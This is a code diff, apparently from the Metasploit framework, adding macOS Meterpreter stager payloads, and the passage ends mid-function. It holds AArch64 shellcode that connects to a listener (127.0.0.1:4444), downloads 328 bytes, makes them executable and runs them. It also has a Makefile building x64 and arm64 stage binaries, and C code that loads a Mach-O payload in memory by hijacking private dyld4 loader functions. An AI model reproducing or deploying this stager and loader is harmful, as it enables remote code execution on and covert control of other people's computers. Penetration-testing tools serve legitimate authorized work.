+// Shellcode: objdump -d a.out | cut -d ' ' -f 2- | ruby tools/payloads/format_aarch64.rb
+.equ SYS_RECVFROM, 0x200001d
+.equ SYS_MPROTECT, 0x200004a
+.equ SYS_CONNECT, 0x2000062
+.equ SYS_SELECT, 0x200005d
+.equ SYS_SOCKET, 0x2000061
+.equ SYS_MMAP, 0x20000c5
+.equ SYS_EXIT, 0x2000001
+
+.equ AF_INET, 0x2
+.equ SOCK_STREAM, 0x1
+
+.equ STDIN, 0x0
+.equ STDOUT, 0x1
+.equ STDERR, 0x2
+
+.equ IP, 0x0100007f
+.equ PORT, 0x5C11
+
+.global _main
+_main:
+  /* mmap(addr=0, length=328, prot=0x2 (PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=-1, offset=0) */
+  mov x0, xzr
+  mov x1, #328
+  mov x2, #2
+  mov x3, #0x1002
+  mvn x4, xzr
+  mov x5, xzr
+  ldr x16, =SYS_MMAP
+  svc 0
+  cmn x0, #0x1
+  beq failed
+
+  /* save retry_count */
+  mov x12, x0
+  mov x10, 0
+  adr x11, retry_count
+  ldr x11, [x11]
+
+  /* socket(AF_INET, SOCK_STREAM, IPPROTO_IP) */
+socket:
+  mov x0, AF_INET
+  mov x1, SOCK_STREAM
+  mov x2, 0
+  ldr x16, =SYS_SOCKET
+  svc 0
+  //cbz w0, retry
+
+  mov x13, x0
+
+  /* connect(sockfd, socket={AF_INET,4444,127.0.0.1}, socklen_t=16) */
+  adr x1, caddr
+  ldr x1, [x1]
+  str x1, [sp, #-8]!
+  mov x1, sp
+  mov x2, 16
+  ldr x16, =SYS_CONNECT
+  svc 0
+  //cbnz w0, retry
+
+  /* recvfrom(sockfd='x13', address='x12', length=328, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */
+  mov x0, x13
+  mov x1, x12
+  mov x2, #328
+  mov x3, #0x40
+  mov x4, xzr
+  mov x5, xzr 
+  ldr x16, =SYS_RECVFROM
+  svc 0
+  //cbnz w0, retry
+
+  /* mprotect(addr, length=328, prot=0x5 (PROT_READ | PROT_EXEC)) */
+  mov x0, x12
+  mov x1, #328
+  mov x2, #5
+  ldr x16, =SYS_MPROTECT
+  svc 0
+
+  br x12
+
+retry:
+  sub x11, x11, #1
+  cmp x11, 0
+  beq failed
+
+  /* select(0, 0, 0, 0, &{sleep_nanoseconds, sleep_seconds}) */
+  mov x0, 0
+  mov x1, 0
+  adr x2, sleep_nanoseconds
+  ldr x2, [x2]
+  adr x3, sleep_seconds
+  ldr x3, [x3]
+  stp x3, x2, [sp, #-16]!
+  mov x4, sp
+  mov x2, 0
+  mov x3, 0
+  ldr x16, =SYS_SELECT
+  svc 0
+  bal socket
+
+failed:
+  mov x0, 0x1
+  ldr x16, =SYS_EXIT
+  svc 0
+
+.balign 16
+caddr:
+  .short AF_INET
+  .short PORT
+  .word IP
+retry_count:
+  .word 0x4242
+  .word 0x4242
+sleep_nanoseconds:
+  .word 0x4343
+  .word 0x4343
+sleep_seconds:
+  .word 0x4444
+  .word 0x4444
@@ -0,0 +1,4 @@
+x64_osx_stage
+x64_osx_stage_debug
+aarch64_osx_stage
+aarch64_osx_stage_debug
@@ -1,19 +1,39 @@
 CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
 GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
 GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
-GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
+GCC_OSX_X64=$(GCC_BASE_OSX) -arch x86_64
+GCC_OSX_AARCH64=$(GCC_BASE_OSX) -arch arm64

-all: clean main_osx
+all: clean x64_osx_stage aarch64_osx_stage

-main_osx: main.c
-	$(GCC_OSX) -o $@ $^
+debug: clean x64_osx_stage_debug aarch64_osx_stage_debug

-install: main_osx
-	cp main_osx ../../../../../data/meterpreter/x64_osx_stage
+x64_osx_stage: main.c
+	$(GCC_OSX_X64) -o $@ $^

-shellcode: install
-	otool -tv main_osx
+x64_osx_stage_debug: main.c
+	$(GCC_OSX_X64) -D DEBUG -o $@ $^ printf/printf.c
+
+aarch64_osx_stage: main.c
+	$(GCC_OSX_AARCH64) -o $@ $^
+
+aarch64_osx_stage_debug: main.c
+	$(GCC_OSX_AARCH64) -D DEBUG -o $@ $^ printf/printf.c
+
+install: x64_osx_stage aarch64_osx_stage
+	cp x64_osx_stage ../../../../../data/meterpreter/x64_osx_stage
+	cp aarch64_osx_stage ../../../../../data/meterpreter/aarch64_osx_stage
+
+install_debug: x64_osx_stage_debug aarch64_osx_stage_debug
+	cp x64_osx_stage_debug ../../../../../data/meterpreter/x64_osx_stage
+	cp aarch64_osx_stage_debug ../../../../../data/meterpreter/aarch64_osx_stage
+
+x64_shellcode: install
+	otool -tv x64_osx_stage
+
+aarch64_shellcode: install
+	otool -tv aarch64_osx_stage

 clean:
-	rm -f *.o main_osx
+	rm -f *.o x64_osx_stage aarch64_osx_stage x64_osx_stage_debug aarch64_osx_stage_debug

@@ -1,3 +1,4 @@
+
 /*
 * References:
 * @parchedmind
@@ -184,6 +185,19 @@ struct LoadOptions
    Missing     pathNotFoundHandler;// = nullptr;
 };

+struct InitialOptions
+{
+      bool inDyldCache;//        = false;
+      bool hasObjc;//            = false;
+      bool mayHavePlusLoad;//    = false;
+      bool roData;//             = false;
+      bool neverUnloaded;//      = false;
+      bool leaveMapped;//        = false;
+      bool roObjC;//             = false;
+      bool pre2022Binary;//      = false;
+ };
+
+
 struct Loaded {
  void* _allocator;//           = nullptr;
  void* * elements;//             = nullptr;
@@ -234,18 +248,25 @@ typedef NSModule (*NSLinkModule_ptr)(NSObjectFileImage objectFileImage, const ch
 typedef NSSymbol (*NSLookupSymbolInModule_ptr)(NSModule module, const char *symbolName);
 typedef void * (*NSAddressOfSymbol_ptr)(NSSymbol symbol);

-typedef /*Loader*/void * (*JustInTimeLoaderMake_ptr)(void *apis, void *ma, const char* path, const struct FileID * fileId, uint64_t sliceOffset, bool willNeverUnload, bool leaveMapped, bool overridesCache, uint16_t overridesDylibIndex);
+typedef /*Loader*/void * (*JustInTimeLoaderMake_ptr)(void *apis, void *ma, const char* path, const struct FileID * fileId, uint64_t sliceOffset, bool willNeverUnload, bool leaveMapped, bool overridesCache, uint16_t overridesDylibIndex, uint64_t layout);
+typedef /*Loader*/void * (*JustInTimeLoaderMake2_ptr)(void *apis, void *ma, const char* path, const struct FileID * fileId, uint64_t sliceOffset, bool willNeverUnload, bool leaveMapped, bool overridesCache, uint16_t overridesDylibIndex);
 typedef void * (*AnalyzeSegmentsLayout_ptr)(void *ma, uintptr_t * vmSpace, bool * hasZeroFill);
 typedef void * (*VMAllocate_ptr)(uint64_t target_task, void * address, uint64_t size, int flags);
 typedef void * (*VMDeallocate_ptr)(uint64_t target_task, void * address, uint64_t size);
 typedef void * (*WithRegions_ptr)(void *ma, void * callback);
+//typedef uint32_t (*DependentDylibCount_ptr)(void *ma, bool * alldepsarenormal);
+//typedef bool (*HasPlusLoad_ptr)(void *ma);
 typedef void * (*MMap_ptr)(void * sdg, void *addr, size_t length, int prot, int flags, int fd, uint64_t offset);
 void * memcpy2(void *dest, const void *src, size_t len);
 typedef void * (*Mprotect_ptr)(void * sdg, void * dst, uint64_t length, int prot);
 typedef void (*WithLoadersWriteLock_ptr)(void *apis, void * callback);
+//typedef void * (*LoaderLoader_ptr)(void * loader, const struct InitialOptions *, bool prebuilt, bool prebuiltApp, bool prebuiltIndex);
 typedef void (*LoadDependents_ptr)(void *topLoader, const struct diagnostics * diag, void * apis, const struct LoadOptions * lo);
+//typedef bool (*EnforceFormat_ptr)(void * ma, int malformed);
 typedef void (*RunInitializers_ptr)(void *topLoader, void * apis);
+typedef void * (*HandleFromLoader_ptr)(void *loader, bool firstOnly);
 typedef void (*IncDlRefCount_ptr)(void *apis, void * topLoader);
+//typedef void (*AddLoader_ptr)(void *apis, void * topLoader);
 typedef void (*NotifyLoad_ptr)(void * apis, struct ArrayOfLoaderPointers * newLoaders);
 typedef void (*NotifyDebuggerLoad_ptr)(void * apis, const struct ArrayOfLoaderPointers * aolp);
 typedef void (*ApplyFixups_ptr)(void * ldr, const struct diagnostics * diag, void * apis, struct DyldCacheDataConstLazyScopedWriter * dcd, bool b);
@@ -256,7 +277,6 @@ typedef bool (*HasThreadLocalVariables_ptr)(void * ma);
 typedef void (*SetUpTLVs_ptr)(void * ma, void * apis);
 typedef void (*AddWeakDefs_ptr)(void * apis, void * newLoaders);

-typedef uint64_t (*SimpleDPrintf_ptr)(uint64_t fd, const char * fmt, const void * a);

 uint64_t find_macho(uint64_t addr, unsigned int increment);
 uint64_t find_dylib(uint64_t addr, unsigned int increment);
@@ -269,7 +289,16 @@ uint64_t roundUp(uint64_t numToRound, uint64_t multiple);
 //#define DEBUG
 #ifdef DEBUG
 static void print(char * str);
-#define printf(a,b) print(a);
+#include "printf/printf.h"
+void _putchar(char character) {
+  char t[2];
+  t[0] = character;
+  t[1] = 0;
+  print(t);
+}
+#else
+#define print(a)
+#define printf(a,b)
 #endif


@@ -278,20 +307,23 @@ static void print(char * str);

 int main(int argc, char** argv)
 {
-#ifdef DEBUG
  print("main!\n");
-#endif
  uint64_t buffer = 0;
  uint64_t buffer_size = 0;
+#ifdef __aarch64__
+  __asm__(
+      "mov %0, x12\n"
+      "mov %1, x10\n"
+      : "=r"(buffer), "=r"(buffer_size));
+#else
  __asm__(
      "movq %%r10, %0;\n"
      "movq %%r12, %1;\n"
      : "=g"(buffer), "=g"(buffer_size));
-
-#ifdef DEBUG
-  print("hello world!\n");
 #endif

+  print("hello world!\n");
+
  int sierra = detect_sierra();
  uint64_t binary = DYLD_BASE_ADDR;
  uint64_t dyld;
@@ -341,9 +373,7 @@ int main(int argc, char** argv)
    }
    NSCreateObjectFileImageFromMemory_func = find_symbol(dyld, "_NSCreateObjectFileImageFromMemory", offset);
  }
-#ifdef DEBUG
  print("good symbol!\n");
-#endif

  // gDyld is a special struct that libdyld.dylib uses to interface with dyld4.
  // gDyld is not present in dyld3 and back.
@@ -351,142 +381,128 @@ int main(int argc, char** argv)
  //printf("gDyld: %lld\n", gDyld);
  void * addr_main = 0;
  if (gDyld != 0) {
-#ifdef DEBUG
    print("gDyld found, using dual hijack technique.\n");
-#endif
    // Also known as the RuntimeState or Allocator.
    void* apis = ((struct libdyldDyld4Section*)gDyld)->apis;
-#ifdef DEBUG
    printf("apis: %lld\n", apis);
-    printf("config: %i\n", (int)*(void **)(apis+8));
-#endif
+    printf("config: %lld\n", *(void **)(apis+8));
    // config is offset around 0x100000 from the start of dyld4.
    uint64_t base = roundUp((uint64_t)(*(void **)(apis+8) - 0x00100000), 0x1000);
-#ifdef DEBUG
    printf("base: %lld\n", base);
-#endif
    // sdyld will be the address of dyld4, which contains mangled symbols.
    uint64_t sdyld = find_macho(base, 0x1000);
-#ifdef DEBUG
+    uint64_t offset2 = sdyld;
    printf("sdyld: %lld\n", sdyld);
-#endif
-    JustInTimeLoaderMake_ptr JustInTimeLoaderMake_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader4makeERNS_12RuntimeStateEPKN5dyld313MachOAnalyzerEPKcRKNS_6FileIDEybbbt", sdyld);
-    while (!JustInTimeLoaderMake_func) {
+    MMap_ptr MMap_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate4mmapEPvmiiim", offset2);
+    while (!MMap_func) {
      sdyld = find_macho(sdyld + 0x1000, 0x1000);
      if (sdyld == 1) {
-#ifdef DEBUG
        print("failed.\n");
-#endif
        return 1;
      }
      //printf("Dyld: %lld\n", sdyld);
-      JustInTimeLoaderMake_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader4makeERNS_12RuntimeStateEPKN5dyld313MachOAnalyzerEPKcRKNS_6FileIDEybbbt", sdyld);
+      MMap_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate4mmapEPvmiiim", offset2);
    }
-    //printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-    //printf("JITLMP: %lld\n", JustInTimeLoaderMake_func);
-    SimpleDPrintf_ptr SimpleDPrintf_func = find_symbol(sdyld, "__simple_dprintf", sdyld);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "SimpleDPrintf_func: %lld\n", SimpleDPrintf_func);
-#endif
+    //printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
+    JustInTimeLoaderMake_ptr JustInTimeLoaderMake_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader4makeERNS_12RuntimeStateEPKN5dyld313MachOAnalyzerEPKcRKNS_6FileIDEybbbt", offset2);
+    JustInTimeLoaderMake2_ptr JustInTimeLoaderMake2_func = 0;
+    bool ventura = false;
+    if (!JustInTimeLoaderMake_func) {
+      offset2 = offset;
+      ventura = true;
+      MMap_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate4mmapEPvmiiim", offset2);
+      JustInTimeLoaderMake2_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader4makeERNS_12RuntimeStateEPKN5dyld39MachOFileEPKcRKNS_6FileIDEybbbtPKN6mach_o6LayoutE", offset2);
+    }
+    if (ventura) {
+      print("Ventura!\n");
+    }
+    //printf("SimpleDPrintf_func: %lld\n", SimpleDPrintf_func);
+    printf("Errno: %lld\n", *(uint64_t*)find_symbol(sdyld, "_errno", offset2));
    // Loader::mapSegments
    uintptr_t vmSpace = 0;
    bool hasZeroFill;
-    AnalyzeSegmentsLayout_ptr AnalyzeSegmentsLayout_func = find_symbol(sdyld, "__ZNK5dyld313MachOAnalyzer21analyzeSegmentsLayoutERyRb", sdyld);
-#ifdef DEBUG
-    print("Analyzing Segments.\n");
-#endif
    *(uint32_t*)buffer = 0xfeedfacf;
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "Buffer: %lld\n", buffer);
-#endif
-    AnalyzeSegmentsLayout_func((void*)buffer, &vmSpace, &hasZeroFill);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "vmSpace: %lld\n", vmSpace);
-#endif
+    printf("Buffer: %lld\n", buffer);
+    if (ventura) {
+      // MachOFile =~= MachOAnalyzer
+      AnalyzeSegmentsLayout_ptr AnalyzeSegmentsLayout_func = find_symbol(sdyld, "__ZNK5dyld39MachOFile21analyzeSegmentsLayoutERyRb", offset2);
+      print("Analyzing Segments.\n");
+      AnalyzeSegmentsLayout_func((void*)buffer, &vmSpace, &hasZeroFill);
+    } else {
+      AnalyzeSegmentsLayout_ptr AnalyzeSegmentsLayout_func = find_symbol(sdyld, "__ZNK5dyld313MachOAnalyzer21analyzeSegmentsLayoutERyRb", offset2);
+      print("Analyzing Segments.\n");
+      AnalyzeSegmentsLayout_func((void*)buffer, &vmSpace, &hasZeroFill);
+    };
+    printf("vmSpace: %lld\n", vmSpace);
    bool isTranslated = false; // Rosetta.
    uint64_t extraAllocSize = 0;
    if ((*(uint64_t **)(apis + 8))[0x7c] != 0) {
      isTranslated = true;
-#ifdef DEBUG
      print("Rosetta.\n");
-#endif
      // TODO: Rosseta requires a bit more space...
      extraAllocSize = 0x0;
    }
    vmSpace += extraAllocSize;
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "Translated: %s\n", isTranslated ? "true" : "false");
-#endif
+    printf("Translated: %s\n", isTranslated ? "true" : "false");
    uintptr_t loadAddress = 0;
-    VMAllocate_ptr VMAllocate_func = find_symbol(sdyld, "_vm_allocate", sdyld);
-    uint64_t mach_task_self = *(uint64_t*)find_symbol(sdyld, "_mach_task_self_", sdyld);
+    VMAllocate_ptr VMAllocate_func = find_symbol(sdyld, "_vm_allocate", offset2);
+    uint64_t mach_task_self = *(uint64_t*)find_symbol(sdyld, "_mach_task_self_", offset2);
    void * vmallocate_ret = VMAllocate_func(mach_task_self, &loadAddress, vmSpace, /*VM_FLAGS_ANYWHERE: */0x1);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "VMAllocate Ret: %lld\n", vmallocate_ret);
-    SimpleDPrintf_func(1, "LoadAddress: %lld\n", loadAddress);
-#endif
+    printf("VMAllocate Ret: %lld\n", vmallocate_ret);
+    printf("LoadAddress: %lld\n", loadAddress);
    // Put regions together...
    // JustInTimeLoader::withRegions via MachOAnalyzer::getAllSegmentsInfos
-    WithRegions_ptr WithRegions_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader11withRegionsEPKN5dyld313MachOAnalyzerEU13block_pointerFvRKNS1_5ArrayINS_6Loader6RegionEEEE", sdyld);
+    WithRegions_ptr WithRegions_func = 0;
+    if (ventura) {
+      WithRegions_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader11withRegionsEPKN5dyld39MachOFileEU13block_pointerFvRKNS1_5ArrayINS_6Loader6RegionEEEE", offset2);
+    } else {
+      WithRegions_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader11withRegionsEPKN5dyld313MachOAnalyzerEU13block_pointerFvRKNS1_5ArrayINS_6Loader6RegionEEEE", offset2);
+    };
    WithRegions_func((void*)buffer, ^(struct ArrayOfRegions * rptr) {
-#ifdef DEBUG
-        SimpleDPrintf_func(1, "Region Ptrs: %lld\n", rptr);
-        SimpleDPrintf_func(1, "usedCount: %lld\n", rptr->_usedCount);
-        SimpleDPrintf_func(1, "allocCount: %lld\n", rptr->_allocCount);
-#endif
+        printf("Region Ptrs: %lld\n", rptr);
+        printf("usedCount: %lld\n", rptr->_usedCount);
+        printf("allocCount: %lld\n", rptr->_allocCount);
        uint32_t segIndex = 0;
        uint64_t sliceOffset = 0;
        uint64_t lastOffset = 0;
        for (int i = 0 ; i < rptr->_usedCount; i++) {
          const struct Region region = rptr->_elements[i];
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Region vmOffset: %lld\n", region.vmOffset);
-          SimpleDPrintf_func(1, "Region perms: %lld\n", region.perms);
-          SimpleDPrintf_func(1, "Region isZeroFill: %lld\n", region.isZeroFill);
-          SimpleDPrintf_func(1, "Region readOnlyData: %lld\n", region.readOnlyData);
-          SimpleDPrintf_func(1, "Region fileOffset: %lld\n", region.fileOffset);
-          SimpleDPrintf_func(1, "Region fileSize: %lld\n", region.fileSize);
+          printf("Region vmOffset: %lld\n", region.vmOffset);
+          printf("Region perms: %lld\n", region.perms);
+          printf("Region isZeroFill: %lld\n", region.isZeroFill);
+          printf("Region readOnlyData: %lld\n", region.readOnlyData);
+          printf("Region fileOffset: %lld\n", region.fileOffset);
+          printf("Region fileSize: %lld\n", region.fileSize);
          print("----\n");
-#endif
          if ( region.isZeroFill || (region.fileSize == 0) )
            continue;
          if ( (region.vmOffset == 0) && (segIndex > 0) )
            continue;
          int perms = region.perms;
-          MMap_ptr MMap_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate4mmapEPvmiiim", sdyld);
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-          SimpleDPrintf_func(1, "Addr: %lld\n", (void*)(loadAddress + region.vmOffset));
-          SimpleDPrintf_func(1, "Size: %lld\n", (size_t)region.fileSize);
-          SimpleDPrintf_func(1, "Perms: %lld\n", region.perms);
-          SimpleDPrintf_func(1, "Flags: %lld\n", MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS);
-          SimpleDPrintf_func(1, "FD: %lld\n", (int)-1);
-          SimpleDPrintf_func(1, "Offset: %lld\n", (size_t)(sliceOffset + region.fileOffset));
-#endif
+          printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
+          printf("Addr: %lld\n", (void*)(loadAddress + region.vmOffset));
+          printf("Size: %lld\n", (size_t)region.fileSize);
+          printf("Perms: %lld\n", region.perms);
+          printf("Flags: %lld\n", MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS);
+          printf("FD: %lld\n", (int)-1);
+          printf("Offset: %lld\n", (size_t)(sliceOffset + region.fileOffset));
          // MMap will init this with zeros.
          void* segAddress = MMap_func(*(void **)(apis+ 8), (void*)(loadAddress + region.vmOffset), (size_t)region.fileSize, PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
          lastOffset = loadAddress + region.vmOffset + region.fileSize;
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-          SimpleDPrintf_func(1, "Buffer: %lld\n", buffer);
-          SimpleDPrintf_func(1, "BufferO: %lld\n", buffer + sliceOffset + region.fileOffset);
-#endif
+          printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
+          printf("Buffer: %lld\n", buffer);
+          printf("BufferO: %lld\n", buffer + sliceOffset + region.fileOffset);
          memcpy2(segAddress, (const void *)(buffer + sliceOffset + region.fileOffset), (size_t)region.fileSize);
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-#endif
-          Mprotect_ptr Mprotect_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate8mprotectEPvmi", sdyld);
+          printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
+          Mprotect_ptr Mprotect_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate8mprotectEPvmi", offset2);
          Mprotect_func(*(void **)(apis+ 8), segAddress, (size_t)region.fileSize, perms);
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "SegAddress: %lld\n", segAddress);
-          SimpleDPrintf_func(1, "Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-#endif
+          printf("SegAddress: %lld\n", segAddress);
+          printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
          ++segIndex;
        }
    });
    // Okay, we should be good to go with JustInTimeLoader::make.
    // __ZNK5dyld39MachOFile11installNameEv: ""
-    WithLoadersWriteLock_ptr WithLoadersWriteLock_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState20withLoadersWriteLockEU13block_pointerFvvE", sdyld);
    // We cannot use __block as it corrupts the stack, so we have to use a malloc technique to pass data.
    uintptr_t structspace = 0;
    uint64_t structspacesize = sizeof(void *)+ // rtopLoader
@@ -496,59 +512,46 @@ int main(int argc, char** argv)
        sizeof(struct LoadChain)+ // loadChain
        sizeof(struct LoadOptions)+ // depOptions
        sizeof(struct diagnostics); // diag
+    int initialoptionsoffset = structspacesize;
    VMAllocate_func(mach_task_self, &structspace, structspacesize, 0x1);
    uint64_t * rtopLoader = (uint64_t *)(structspace);;
-    WithLoadersWriteLock_func(apis, ^(){
+    if (ventura) {
      struct Loaded * loaded = (struct Loaded*)(apis+32);
      uintptr_t startLoaderCount = loaded->size;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "Loaded Size: %lld\n", loaded->size);
-      SimpleDPrintf_func(1, "Loaded first: %lld\n", (loaded->elements));
-      SimpleDPrintf_func(1, "Loaded Capacity: %lld\n", loaded->capacity);
-#endif
+      printf("Loaded Size: %lld\n", loaded->size);
+      printf("Loaded first: %lld\n", (loaded->elements));
+      printf("Loaded Capacity: %lld\n", loaded->capacity);
      struct FileID * fileid = (struct FileID *)(rtopLoader+sizeof(void *));// = { 0, 0, false };
      fileid->iNode = 0;
      fileid->modTime = 0;
      fileid->isValid = false;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "Apis: %lld\n", apis);
-      SimpleDPrintf_func(1, "LoadAddress: %lld\n", loadAddress);
-      SimpleDPrintf_func(1, "JITLMP: %lld\n", JustInTimeLoaderMake_func);
-#endif
-      void * topLoader = JustInTimeLoaderMake_func(apis, (void *)loadAddress, "", fileid, 0, false, true, false, 0);
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "TopLoader: %lld\n", topLoader);
-      SimpleDPrintf_func(1, "Toploader (*(int*)this): %i\n", *(int *)topLoader);
-      SimpleDPrintf_func(1, "Loaded Size: %lld\n", loaded->size);
-      SimpleDPrintf_func(1, "Loaded Capacity: %lld\n", loaded->capacity);
-#endif
+      printf("Apis: %lld\n", apis);
+      printf("LoadAddress: %lld\n", loadAddress);
+      printf("JITLMP: %lld\n", JustInTimeLoaderMake_func);
+      void * topLoader = JustInTimeLoaderMake2_func(apis, (void *)loadAddress, "A", fileid, 0, false, true, false, 0);
+      printf("TopLoader: %lld\n", topLoader);
+      printf("Toploader (*(int*)this): %i\n", *(int *)topLoader);
+      printf("Loaded Size: %lld\n", loaded->size);
+      printf("Loaded Capacity: %lld\n", loaded->capacity);
      struct PartialLoader * pl = (struct PartialLoader *)topLoader;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "LoadAddress: %lld\n", pl->mappedAddress);
-      SimpleDPrintf_func(1, "lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
-      SimpleDPrintf_func(1, "hidden: %lld\n", pl->hidden);
-      SimpleDPrintf_func(1, "Magic: %lld\n", pl->magic);
-      SimpleDPrintf_func(1, "IsPrebuilt: %lld\n", pl->isPrebuilt);
-#endif
+      printf("LoadAddress: %lld\n", pl->mappedAddress);
+      printf("lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
+      printf("hidden: %lld\n", pl->hidden);
+      printf("Magic: %lld\n", pl->magic);
+      printf("IsPrebuilt: %lld\n", pl->isPrebuilt);
      pl->lateLeaveMapped = 1;
      pl = (struct PartialLoader *)topLoader;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
-#endif
+      printf("lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
      struct LoadChain * loadChainMain = (struct LoadChain *)(fileid+sizeof(struct FileID));// = { 0, *(void **)(apis+24) };
      loadChainMain->previous = 0;
      loadChainMain->image = *(void **)(apis+24);
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "mainExecutableLoader: %lld\n", *(void **)(apis+24));
-      SimpleDPrintf_func(1, "mainExecutableLoader: %lld\n", loadChainMain->image);
-#endif
+      printf("mainExecutableLoader: %lld\n", *(void **)(apis+24));
+      printf("mainExecutableLoader: %lld\n", loadChainMain->image);
      struct LoadChain * loadChainCaller = (struct LoadChain *)(loadChainMain+sizeof(struct LoadChain));// = { &loadChainMain, &(loaded->elements[0]) };
      loadChainCaller->previous = &loadChainMain;
      loadChainCaller->image = &(loaded->elements[0]);
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "LoadedElements: %lld\n", &(loaded->elements[0]));
-      SimpleDPrintf_func(1, "Toploader (*(int*)this): %i\n", *(int *)topLoader);
-#endif
+      printf("LoadedElements: %lld\n", &(loaded->elements[0]));
+      printf("Toploader (*(int*)this): %i\n", *(int *)topLoader);
      struct LoadChain * loadChain = (struct LoadChain *)(loadChainCaller+sizeof(struct LoadChain));// = { &loadChainCaller, topLoader };
      loadChain->previous = &loadChainCaller;
      loadChain->image = topLoader;
@@ -559,102 +562,187 @@ int main(int argc, char** argv)
      depOptions->canBeDylib       = true;
      depOptions->rpathStack       = loadChain;
      depOptions->useFallBackPaths = true;
-      LoadDependents_ptr LoadDependents_func = find_symbol(sdyld, "__ZN5dyld46Loader14loadDependentsER11DiagnosticsRNS_12RuntimeStateERKNS0_11LoadOptionsE", sdyld);
+      LoadDependents_ptr LoadDependents_func = find_symbol(sdyld, "__ZN5dyld46Loader14loadDependentsER11DiagnosticsRNS_12RuntimeStateERKNS0_11LoadOptionsE", offset2);
      struct diagnostics * diag = (struct diagnostics *)(depOptions+sizeof(struct LoadOptions));
      diag->_buffer = 0;
      LoadDependents_func(topLoader, diag, apis, depOptions);
      if (diag->_buffer != 0) {
-#ifdef DEBUG
        print("Error\n");
-#endif
      };
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "buffer: %lld\n", diag->_buffer);
-      SimpleDPrintf_func(1, "startLoaderCount: %lld\n", startLoaderCount);
-#endif
+      printf("buffer: %lld\n", diag->_buffer);
+      printf("startLoaderCount: %lld\n", startLoaderCount);
      uint64_t newLoadersCount = loaded->size - startLoaderCount;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "newLoadersCount: %lld\n", newLoadersCount);
-#endif
+      printf("newLoadersCount: %lld\n", newLoadersCount);
      void * * newLoaders = &loaded->elements[startLoaderCount];
      struct ArrayOfLoaderPointers newLoadersArray = { newLoaders, newLoadersCount, newLoadersCount };
      if (newLoadersCount != 0) {
-        NotifyDebuggerLoad_ptr NotifyDebuggerLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState18notifyDebuggerLoadERKN5dyld35ArrayIPKNS_6LoaderEEE", sdyld);
+        NotifyDebuggerLoad_ptr NotifyDebuggerLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState18notifyDebuggerLoadERKNSt3__14spanIPKNS_6LoaderELm18446744073709551615EEE", offset2);
        NotifyDebuggerLoad_func(apis, &newLoadersArray);
        if (*(char *)(apis + 0x7f) != '\0') {
-          AddWeakDefs_ptr AddWeakDefs_func = find_symbol(sdyld, "__ZN5dyld46Loader16addWeakDefsToMapERNS_12RuntimeStateERKN5dyld35ArrayIPKS0_EE", sdyld);
+          AddWeakDefs_ptr AddWeakDefs_func = find_symbol(sdyld, "__ZN5dyld46Loader16addWeakDefsToMapERNS_12RuntimeStateERKNSt3__14spanIPKS0_Lm18446744073709551615EEE", offset2);
          AddWeakDefs_func(apis, &newLoadersArray);
-#ifdef DEBUG
          print("WeakRefed\n");
-#endif
        }
-        ApplyFixups_ptr ApplyFixups_func = find_symbol(sdyld, "__ZNK5dyld46Loader11applyFixupsER11DiagnosticsRNS_12RuntimeStateERNS_34DyldCacheDataConstLazyScopedWriterEb", sdyld);
